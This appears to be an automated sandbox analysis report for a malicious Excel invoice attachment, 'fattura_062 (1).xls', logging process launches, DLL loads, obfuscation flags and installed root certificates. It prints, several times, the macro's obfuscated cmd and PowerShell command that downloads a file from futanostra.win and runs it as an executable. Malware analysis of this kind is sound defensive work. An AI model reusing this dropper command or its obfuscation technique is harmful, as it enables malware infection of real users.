    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .."..............P................'.......'.....}..w.............................1......(.P..............3........".............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................tR.l....}..w............\.......................(.P......................@..............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................n.o.t. .b.e. .r.e.s.o.l.v.e.d.:. .'.f.u.t.a.n.o.s.t.r.a...w.i.n.'.".............h?......D.......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................tR.l....}..w............\.......................(.P......................@..............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1. .\......S.l......k.....(.P.....................h?...... .......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".............................................}..w............ .\......S.l......k.....(.P.......................".............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".............................................}..w............ .\......S.l......k.....(.P.......................".............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".............................................}..w............ .\......S.l......k.....(.P.......................".............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".............................................}..w............ .\......S.l......k.....(.P.......................".....T.......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ...............}..w............ .\......S.l......k.....(.P.....................h?..............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".............................................}..w..............\........l.....Qk.....(.P.......................".............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w............\.......................(.P.....................................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................f.i.n.d. .t.h.e. .f.i.l.e. .s.p.e.c.i.f.i.e.d....Qk.....(.P.............................0.......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w............\.......................(.P.....................................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.9.8.\........l.....Qk.....(.P.............................".......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".............................................}..w..............\........l.....Qk.....(.P.......................".............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".............................................}..w..............\........l.....Qk.....(.P.......................".............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".............................................}..w..............\........l.....Qk.....(.P.......................".............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n......l.....Qk.....(.P.............................&.......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".............................................}..w..............\........l.....Qk.....(.P.......................".............................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.............................<.......................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ...............}..w..............\........l.....Qk.....(.P.....................................................Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: fattura_062 (1).xlsReversingLabs: Detection: 86%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)Jump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.pdbpdbtem.pdbltW source: powershell.exe, 00000004.00000002.410988470.000000001AA52000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.411259916.000000001C30B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: b.pdbpdblib.pdb source: powershell.exe, 00000004.00000002.411259916.000000001C300000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ??\C:\Windows\mscorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000004.00000002.411259916.000000001C287000.00000004.00000020.00020000.00000000.sdmp
    Source: fattura_062 (1).xlsInitial sample: OLE summary lastprinted = 2006-04-30 17:31:23

    Data Obfuscation

    barindex
    Document contains an embedded VBA with many string operations indicating source code obfuscation
    Source: fattura_062 (1).xlsStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : High number of string operations
    Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module ThisWorkbookName: ThisWorkbook
    Source: fattura_062 (1).xls.0.drStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : High number of string operations
    Source: 58230000.0.drStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : High number of string operations
    Obfuscated command line found
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"Jump to behavior
    PowerShell case anomaly found
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)Jump to behavior

    Persistence and Installation Behavior

    barindex
    Installs new ROOT certificates
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
